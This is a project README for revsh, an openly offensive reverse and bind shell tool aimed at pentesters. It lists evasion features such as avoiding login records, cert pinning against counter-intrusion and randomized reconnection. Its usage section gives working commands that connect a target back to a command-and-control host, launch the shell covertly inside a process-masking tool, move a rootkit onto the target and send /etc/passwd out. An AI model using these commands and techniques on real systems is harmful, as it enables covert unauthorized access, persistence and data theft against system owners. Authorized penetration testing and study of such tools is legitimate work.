
A tool for establishing reverse shells with terminal support.

Primary LanguageCMIT LicenseMIT


revsh is a tool for establishing a reverse shell with terminal support.

What is a "reverse shell"?

A reverse shell is a network connection that grants shell access to a remote host. As opposed to other remote login tools such as telnet and ssh, a reverse shell is initiated by the remote host. This technique of connecting outbound from the remote network allows for circumvention of firewalls that are configured to block inbound connections only.

What is a "bind shell"?

A bind shell is a shell that is served from a normal forward network connection. revsh supports both reverse and bind shells. To invoke a bind shell, either call revsh with the -b flag on both ends of the connection, or call the binary as 'bindsh'.

Can't I just use netcat?

There are many techniques for establishing a reverse shell, but these methods don't provide terminal support. revsh allows for a reverse shell whose connection is mediated by a pseudo-terminal, and thus allows for features such as:

In addition, revsh also offers the following features:

  • UTF-8 support.
  • Circumvents utmp / wtmp. (No login recorded.)
  • Processes rc file commands upon login for easy scripting.
  • OpenSSL encryption with key based authentication baked into the binary.
  • Anonymous Diffie-Hellman encryption upon request.
  • Ephemeral Diffie-Hellman encryption as default. (Now with more Perfect Forward Secrecy!)
  • Cert pinning for protection against sinkholes and mitm counter-intrusion.
  • Connection timeout for remote process self-termination.
  • Randomized retry timers for non-predictable auto-reconnection.
  • Netcat style non-interactive data brokering for file transfer.

revsh is intended as a supplementary tool for a pentester's toolkit that provides the full set of terminal features across an encrypted tunnel. All together in a small (~50k) easy to use binary.

Where can I use revsh?

revsh was developed on x86_64 Linux. Here is a brief list of Arch / OS combinations that it has been used on:

  • x86_64 Linux
  • i686 Linux
  • amd64 FreeBSD

(If you have successfully used revsh on another platform, drop me a line and I'll add it to the list.)


empty@monkey:~$ revsh -h

usage:    revsh [-c [-a] [-d KEYS_DIR] [-f RC_FILE]] [-s SHELL] [-t SEC] [-r SEC1[,SEC2]] [-b [-k]] [-n] [-v] [ADDRESS:PORT]

  -c              Run in command and control mode.                 (Default is target mode.)
  -a              Enable Anonymous Diffie-Hellman mode.            (Default is "!ADH:DHE-RSA-AES256-SHA".)
  -d KEYS_DIR     Reference the keys in an alternate directory.    (Default is "~/.revsh/keys/".)
  -f RC_FILE      Reference an alternate rc file.                  (Default is "~/.revsh/rc".)
  -s SHELL        Invoke SHELL as the remote shell.                (Default is "/bin/bash".)
  -t SEC          Set the connection timeout to SEC seconds.       (Default is "3600".)
  -r SEC1,SEC2    Set the retry time to be SEC1 seconds, or        (Default is "600,1200".)
                  to be random in the range from SEC1 to SEC2.
  -b              Start in bind shell mode.                        (Default is reverse shell mode.)
  -k              Start the bind shell in keep-alive mode.         (Ignored in reverse shell mode.)
  -n              Non-interactive netcat style data broker.        (Default is interactive w/remote tty.)
                  No tty. Useful for copying files.
  -v              Verbose output.
  -h              Print this help.
  ADDRESS:PORT    The address and port of the listening socket.    (Default is "".)

      * The -b flag must be invoked on both the control and target hosts to enable bind shell mode.
      * Bind shell mode can also be enabled by invoking the binary as 'bindsh' instead of 'revsh'.
      * Verbose output may mix with data if -v is used together with -n.

  Interactive example:
      local controller host:    revsh -c
      remote target host:       revsh

  Non-interactive example:
      local controller host:    cat ~/bin/rootkit | revsh -n -c
      remote target host:       revsh > ./totally_not_a_rootkit


First, setup the local host to be the command and control host (e.g. "monkey"):

empty@monkey:~$ revsh -c

Then connect out from the remote target host (e.g. "kitty"):

target@kitty:~$ ./revsh

We will now find a shell waiting for us back at the control host:

Listening on  Connected!
 Remote fingerprint expected: 09a348e737b96961d7ff9d55f958e771828f839e
 Remote fingerprint received: 09a348e737b96961d7ff9d55f958e771828f839e
Initializing... Done!

# hostname: kitty
# ip address:
# real user: target
# effective user: target
target@kitty:/$ ls -l /etc/passwd
-rw-r--r-- 1 root root 1538 Jul 18 22:50 /etc/passwd

Note, if you configured the binary at build time to change the IP:PORT address to, then the above example becomes even cleaner:

empty@monkey:~$ revsh -c
target@kitty:~$ ./revsh

For a covert reverse shell, revsh can be invoked from within mimic on the target host:

empty@monkey:~$ revsh -c
target@kitty:~$ /tmp/mimic -e '/tmp/revsh -s "/tmp/mimic -e /bin/bash"'

For netcat style data transfer (with all of the crypto benefits of revsh) invoke revsh with the -n switch. This is useful for moving tools on to the target host:

empty@monkey:~$ cat rootkit.tar | ./revsh -c -n
target@kitty:~$ ./revsh >./totally_not_a_rootkit.tar

Or for moving data out from the target host:

empty@monkey:~$ revsh -c
target@kitty:~$ cat /etc/passwd | ./revsh -n


git clone https://github.com/emptymonkey/revsh.git
cd revsh
vi config.h        # Set up new defaults that fit your situation.
make               # This *can* take a very long time, though it usually doesn't.
make install
cd ~/.revsh
vi rc              # Add your favorite startup commands to really customize the feel of your remote shell.
./revsh -h


Currently working on:

  • Local / Remote static port forwarding support.
  • SOCKS 5 proxy dynamic port forwarding support.

Features planned for future releases:

  • Curses interface.
  • Escape character support. (Similar to SSH's '~' escape character suite.)
  • Escape character command line. (Similar to SSH's '~C'.) Commands will include:
    • File upload / download.
    • Proxy creation.
    • Node mapping.
  • Rearrange communication into a mesh topology.

A Quick Note on Ethics

I write and release these tools with the intention of educating the larger IT community and empowering legitimate pentesters. If I can write these tools in my spare time, then rest assured that the dedicated malicious actors have already developed versions of their own.